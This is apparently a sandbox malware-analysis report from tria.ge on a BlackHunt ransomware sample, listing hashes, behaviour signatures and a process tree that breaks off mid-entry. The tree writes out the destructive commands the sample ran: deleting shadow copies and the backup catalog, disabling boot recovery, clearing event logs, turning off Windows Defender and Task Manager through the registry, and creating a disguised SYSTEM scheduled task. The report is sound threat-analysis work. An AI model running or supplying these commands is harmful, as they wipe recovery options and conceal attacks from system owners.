Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    19/01/2024, 01:19

General

  • Target

    ec30512a57d1e93a0ee462a48a5a7d0a752505abdea31c4ed35d24b3ce5c47af.exe

  • Size

    707KB

  • MD5

    b4c65ad8cb1465142cfed0b214102129

  • SHA1

    46208499782227917ee7f00d23c1c13f190d60ee

  • SHA256

    ec30512a57d1e93a0ee462a48a5a7d0a752505abdea31c4ed35d24b3ce5c47af

  • SHA512

    e97088d436309bfe9b9c112d9c9f1004c51b634ba45ae3be5ba001e1d85ac4ce19e5bdd713250d57180c7d4e834ca2c2119a150e9b8b9125a24889c48dcc42d1

  • SSDEEP

    6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1R8xvnh:6uaTmkZJ+naie5OTamgEoKxLWElh

Malware Config

Signatures

  • Deletes NTFS Change Journal 2 TTPs 2 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 5 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
  • Renames multiple (2886) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 27 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 8 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\ec30512a57d1e93a0ee462a48a5a7d0a752505abdea31c4ed35d24b3ce5c47af.exe
    "C:\Users\Admin\AppData\Local\Temp\ec30512a57d1e93a0ee462a48a5a7d0a752505abdea31c4ed35d24b3ce5c47af.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2536
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1312
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
        3⤵
        • Modifies registry class
        PID:2892
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2832
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        3⤵
        • Modifies registry class
        PID:2888
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2532
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        3⤵
        • Modifies registry class
        PID:2292
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2388
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
        3⤵
        • Modifies registry class
        PID:2700
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      2⤵
        PID:2764
        • C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
          3⤵
          • Adds Run key to start application
          PID:672
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
        2⤵
          PID:2760
          • C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
            3⤵
              PID:1684
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
            2⤵
              PID:2864
              • C:\Windows\system32\reg.exe
                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                3⤵
                  PID:1752
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
                2⤵
                  PID:2772
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
                    3⤵
                      PID:3660
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                    2⤵
                      PID:2876
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                        3⤵
                          PID:1800
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
                        2⤵
                          PID:2780
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
                            3⤵
                              PID:2840
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                            2⤵
                              PID:2120
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                                3⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1752
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                              2⤵
                                PID:2740
                                • C:\Windows\system32\reg.exe
                                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                                  3⤵
                                    PID:2836
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                                  2⤵
                                    PID:2172
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                                      3⤵
                                        PID:2268
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                                      2⤵
                                        PID:1028
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                                          3⤵
                                            PID:2520
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                                          2⤵
                                            PID:2656
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                                              3⤵
                                                PID:2112
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                              2⤵
                                                PID:2672
                                                • C:\Windows\system32\reg.exe
                                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                                  3⤵
                                                    PID:2904
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                                  2⤵
                                                    PID:2716
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                                      3⤵
                                                        PID:3716
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                      2⤵
                                                        PID:2824
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                          3⤵
                                                            PID:3576
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                                          2⤵
                                                            PID:2188
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                                              3⤵
                                                                PID:1792
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                              2⤵
                                                                PID:2704
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                  3⤵
                                                                    PID:2488
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                                                  2⤵
                                                                    PID:1760
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                                                      3⤵
                                                                        PID:4092
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                                      2⤵
                                                                        PID:2756
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                                          3⤵
                                                                            PID:1608
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                                          2⤵
                                                                            PID:1352
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                                              3⤵
                                                                                PID:1292
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                                              2⤵
                                                                                PID:1516
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                                                  3⤵
                                                                                    PID:3744
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                                                  2⤵
                                                                                    PID:1048
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                                                      3⤵
                                                                                        PID:3732
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                                                      2⤵
                                                                                        PID:2200
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                                                          3⤵
                                                                                            PID:1880
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                                                          2⤵
                                                                                            PID:2368
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                                                              3⤵
                                                                                                PID:944
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                                                              2⤵
                                                                                                PID:2376
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                                                                  3⤵
                                                                                                    PID:3728
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                                                                  2⤵
                                                                                                    PID:764
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                                                                      3⤵
                                                                                                        PID:1544
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ec30512a57d1e93a0ee462a48a5a7d0a752505abdea31c4ed35d24b3ce5c47af.exe" /F
                                                                                                      2⤵
                                                                                                        PID:1228
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ec30512a57d1e93a0ee462a48a5a7d0a752505abdea31c4ed35d24b3ce5c47af.exe" /F
                                                                                                          3⤵
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:1132
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                                        2⤵
                                                                                                          PID:2968
                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                            vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                                            3⤵
                                                                                                            • Enumerates connected drives
                                                                                                            • Interacts with shadow copies
                                                                                                            PID:2964
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                                          2⤵
                                                                                                            PID:2712
                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                              vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                                              3⤵
                                                                                                              • Enumerates connected drives
                                                                                                              • Interacts with shadow copies
                                                                                                              PID:3812
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                                                                                                            2⤵
                                                                                                              PID:312
                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                                                                                                                3⤵
                                                                                                                • Interacts with shadow copies
                                                                                                                PID:916
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                                                                                                              2⤵
                                                                                                                PID:1888
                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                  vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                                                                                                                  3⤵
                                                                                                                  • Interacts with shadow copies
                                                                                                                  PID:3952
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                                                                                                2⤵
                                                                                                                  PID:828
                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                    vssadmin.exe Delete Shadows /all /quiet
                                                                                                                    3⤵
                                                                                                                    • Interacts with shadow copies
                                                                                                                    PID:3572
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                                                                                                  2⤵
                                                                                                                    PID:1696
                                                                                                                    • C:\Windows\system32\bcdedit.exe
                                                                                                                      bcdedit /set {default} recoveryenabled No
                                                                                                                      3⤵
                                                                                                                      • Modifies boot configuration data using bcdedit
                                                                                                                      PID:2228
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                    2⤵
                                                                                                                      PID:2992
                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                        bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                        3⤵
                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                        PID:3744
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                                                                                                      2⤵
                                                                                                                        PID:2164
                                                                                                                        • C:\Windows\system32\fsutil.exe
                                                                                                                          fsutil.exe usn deletejournal /D C:
                                                                                                                          3⤵
                                                                                                                          • Deletes NTFS Change Journal
                                                                                                                          PID:1216
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                                                        2⤵
                                                                                                                          PID:2980
                                                                                                                          • C:\Windows\system32\wbadmin.exe
                                                                                                                            wbadmin.exe delete catalog -quiet
                                                                                                                            3⤵
                                                                                                                            • Deletes backup catalog
                                                                                                                            PID:2384
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                          2⤵
                                                                                                                            PID:2328
                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                              schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                              3⤵
                                                                                                                                PID:1612
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
                                                                                                                              2⤵
                                                                                                                                PID:3704
                                                                                                                                • C:\Windows\system32\fsutil.exe
                                                                                                                                  fsutil usn deletejournal /D F:\
                                                                                                                                  3⤵
                                                                                                                                  • Enumerates connected drives
                                                                                                                                  PID:4048
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
                                                                                                                                2⤵
                                                                                                                                  PID:3900
                                                                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                                                                    fsutil usn deletejournal /D C:\
                                                                                                                                    3⤵
                                                                                                                                      PID:2800
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
                                                                                                                                    2⤵
                                                                                                                                      PID:2596
                                                                                                                                      • C:\Windows\system32\fsutil.exe
                                                                                                                                        fsutil usn deletejournal /D M:\
                                                                                                                                        3⤵
                                                                                                                                        • Enumerates connected drives
                                                                                                                                        PID:1824
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
                                                                                                                                      2⤵
                                                                                                                                        PID:2452
                                                                                                                                        • C:\Windows\system32\wevtutil.exe
                                                                                                                                          wevtutil.exe cl System
                                                                                                                                          3⤵
                                                                                                                                          • Clears Windows event logs
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:2308
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
                                                                                                                                        2⤵
                                                                                                                                          PID:2900
                                                                                                                                          • C:\Windows\system32\wevtutil.exe
                                                                                                                                            wevtutil.exe cl Setup
                                                                                                                                            3⤵
                                                                                                                                            • Clears Windows event logs
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:1640
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
                                                                                                                                          2⤵
                                                                                                                                            PID:3708
                                                                                                                                            • C:\Windows\system32\wevtutil.exe
                                                                                                                                              wevtutil.exe cl Application
                                                                                                                                              3⤵
                                                                                                                                              • Clears Windows event logs
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:2352
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
                                                                                                                                            2⤵
                                                                                                                                              PID:1944
                                                                                                                                              • C:\Windows\system32\wevtutil.exe
                                                                                                                                                wevtutil.exe cl Security
                                                                                                                                                3⤵
                                                                                                                                                • Clears Windows event logs
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2240
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
                                                                                                                                              2⤵
                                                                                                                                                PID:3912
                                                                                                                                                • C:\Windows\system32\wevtutil.exe
                                                                                                                                                  wevtutil.exe cl Security /e:false
                                                                                                                                                  3⤵
                                                                                                                                                  • Clears Windows event logs
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:2676
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                2⤵
                                                                                                                                                  PID:2632
                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                    vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                    3⤵
                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                    PID:3156
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3036
                                                                                                                                                    • C:\Windows\system32\bcdedit.exe
                                                                                                                                                      bcdedit /set {default} recoveryenabled No
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies boot configuration data using bcdedit
                                                                                                                                                      PID:2892
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4052
                                                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                                                        bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                                                        3⤵
                                                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                                                        PID:2956
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2208
                                                                                                                                                        • C:\Windows\system32\fsutil.exe
                                                                                                                                                          fsutil.exe usn deletejournal /D C:
                                                                                                                                                          3⤵
                                                                                                                                                          • Deletes NTFS Change Journal
                                                                                                                                                          PID:3024
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1668
                                                                                                                                                          • C:\Windows\system32\wbadmin.exe
                                                                                                                                                            wbadmin.exe delete catalog -quiet
                                                                                                                                                            3⤵
                                                                                                                                                            • Deletes backup catalog
                                                                                                                                                            PID:1892
                                                                                                                                                        • C:\Windows\System32\cmd.exe
